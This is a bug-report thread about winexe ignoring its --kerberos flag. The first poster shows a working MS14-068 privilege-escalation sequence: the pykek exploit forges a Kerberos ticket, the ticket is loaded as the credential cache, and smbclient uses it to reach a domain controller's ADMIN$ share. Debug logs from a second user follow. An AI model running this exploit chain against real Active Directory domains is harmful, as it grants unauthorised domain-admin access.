#62 Kerberos flag not invoking Kerberos Auth
I am working in an environment that is vulnerable to ms14_068. I created the ticket and used smbclient without issue to access the ADMIN$ share on the domain controller. I attempted to use winexe with ther kerberos flag and it attempts to use NTLMSSP auth and states I have no access to the ADMIN$ share.
Please note I have changed the info such as server names, etc but I assure you everything else is legitimate.
uname -a
Linux Kali-LABS 3.14-kali1-amd64 #1 SMP Debian 3.14.5-1kali1 (2014-06-07) x86_64 GNU/Linux
Output:
root@Kali-LABS:~/pykek# python ms14-068.py -u user1@acme.com -s S-1-5-21-1122334455-1122334455-1122334455-1001 -d server1.acme.com
Password:
[+] Building AS-REQ for server1.acme.com... Done!
[+] Sending AS-REQ to server1.acme.com... Done!
[+] Receiving AS-REP from server1.acme.com... Done!
[+] Parsing AS-REP from server1.acme.com... Done!
[+] Building TGS-REQ for server1.acme.com... Done!
[+] Sending TGS-REQ to server1.acme.com... Done!
[+] Receiving TGS-REP from server1.acme.com... Done!
[+] Parsing TGS-REP from server1.acme.com... Done!
[+] Creating ccache file 'TGT_user1@acme.com.ccache'... Done!
root@Kali-LABS:~/pykek# mv TGT_user1@acme.com.ccache /tmp/krb5cc_0
root@Kali-LABS:~/pykek# smbclient -W ACME.COM //server1.acme.com/ADMIN$ -k
Unable to create directory /var/run/samba for file gencache.tdb. Error was No such file or directory
OS=[Windows Server 2008 R2 Standard 7601 Service Pack 1] Server=[Windows Server 2008 R2 Standard 6.1]
smb: > dir
. D 0 Sat May 10 23:03:00 2014
.. D 0 Sat May 10 23:03:00 2014
ADWS D 0 Fri May 3 20:11:29 2013
AppPatch D 0 Sat May 10 23:11:08 2014
assembly DR 0 Thu Oct 9 09:53:53 2014
bfsvc.exe A 71168 Sat Nov 20 19:12:58 2010
root@Kali-LABS:~/pykek# winexe --kerberos=yes //server1.acme.com 'CMD /C echo %TEMP%' -d3
Enter password:
winexe version 1.1
This program may be freely redistributed under the terms of the GNU GPLv3
Got challenge flags:
Got NTLMSSP neg_flags=0x62898215
NTLMSSP: Set final flags:
Got NTLMSSP neg_flags=0x60088215
IN: async_open(\ahexec, 2)
IN: async_open_recv
ERROR: smb_raw_open_recv - NT_STATUS_OBJECT_NAME_NOT_FOUND
ERROR: on_ctrl_pipe_error - NT_STATUS_OBJECT_NAME_NOT_FOUND
ERROR: Cannot open control pipe - NT_STATUS_OBJECT_NAME_NOT_FOUND, installing service
Installing service
Using binding ncacn_np:server1.acme.com
Got challenge flags:
Got NTLMSSP neg_flags=0x62898215
NTLMSSP: Set final flags:
Got NTLMSSP neg_flags=0x60088215
Got challenge flags:
Got NTLMSSP neg_flags=0x62898215
NTLMSSP: Set final flags:
Got NTLMSSP neg_flags=0x60088215
ERROR: Failed to open ADMIN$ share. NT_STATUS_ACCESS_DENIED.
ERROR: UploadService failed. NT_STATUS_ACCESS_DENIED.
krb5.conf
[realms]
ACME.COM = {
kdc = server1.acme.com:88
kdc = server2.acme.com:88
admin_server = server1.acme.com
default_domain = acme.com
}
[domain_realm]
.acme.com = ACME.COM
I'm having the same issue, same scenario. I compiled winexe from source 2014.12.13 (this morning).
I can use the username/password to run commands, but using just kerberos doesn't work.
doing a -d5 reveals that even though the krb5.conf file specifies the correct KDC's, specifies using DNS, etc...and this works for everything else that does kerberos, when winexe attempts to locate kerberos principals, it is only using the netbios name and it not converting it to the FQDN. No dns queries are performed either other than system A record name lookup.
Here is an excerpt of the logs from winexe:
Failed to get kerberos credentials: kinit for user@ACME failed (Cannot contact any KDC for requested realm)
Cannot reach a KDC we require to contact cifs/dc.acme.local@ : kinit for user@ACME failed (Cannot contact any KDC for requested realm)
I have entries in krb5.conf under [domain_realms] for ACME = ACME.LOCAL, but it doesn't look like winexe is referencing the krb5.conf file at all.
What is even more interesting is that when I specify winexec -k yes, or winexe --kerberos=yes (with the other options) it doesn't try to authenticate with kerberos at all....at least you can't see it in the -d5 output.
sample command:
winexe -U <netbios domain="" name="">/<username> //<fqdn computer="" name=""> '
winexe -U acme/user //dc.acme.local 'ipconfig' -d5
winexe -U acme/user //wkstn.acme.local 'ipconfig' -d5
and the above with -k yes or --kerberos=yes.
When I do the above as a domain admin account, it works, but it does try kerberos by default and because it can't find a KDC for admin@ACME it fails and falls back to ntlmssp which is successful.